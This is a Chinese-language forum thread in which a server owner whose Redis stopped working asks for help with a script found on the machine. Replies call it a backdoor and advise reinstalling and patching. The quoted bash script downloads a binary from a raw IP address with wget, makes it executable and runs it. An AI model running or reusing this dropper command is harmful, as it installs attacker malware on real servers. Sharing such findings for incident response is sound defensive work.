今天發現一台伺服器redis無法連接,在伺服器發現這樣一條指令
#!/bin/bash
zfile="/tmp/z.TF"
if [ ! -f "$zfile" ]; then
wget -P /tmp/ http://27.102.101.67/z.TF && chmod 777 /tmp/z.TF && /tmp/z.TF
fi
下載並執行了z.TF文件,z.TF開啟都是字節碼,此程式可以自動重新執行。
目前將此程式進程殺死,但redis服務仍然無法使用,不知道是否還有其他惡意程式。
請高手解答z.TF的內容?並且如何處理。
z.TF 是個ELF格式的linux執行檔
你伺服器被裝了後門,盡快重裝系統,修復漏洞。
該升級的都升級一遍。
基本上可以確定是 後門+肉雞
話說你把t.ZF的程式碼寄上來啊
你貼出來的程式碼,你不是自己已經解釋清楚了麼